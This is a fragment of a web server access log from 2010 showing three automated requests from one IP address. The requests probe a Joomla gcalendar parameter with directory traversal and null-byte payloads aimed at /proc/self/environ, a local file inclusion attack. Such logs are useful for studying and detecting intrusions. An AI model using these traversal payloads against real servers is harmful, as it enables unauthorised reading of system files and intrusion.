174.121.163.241 - - [11/May/2010:13:25:35 -0500] "GET /logs/access_log.1273276800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
174.121.163.241 - - [11/May/2010:13:25:35 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
174.121.163.241 - - [11/May/2010:13:25:35 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5130 "-""libwww-perl/5.810"
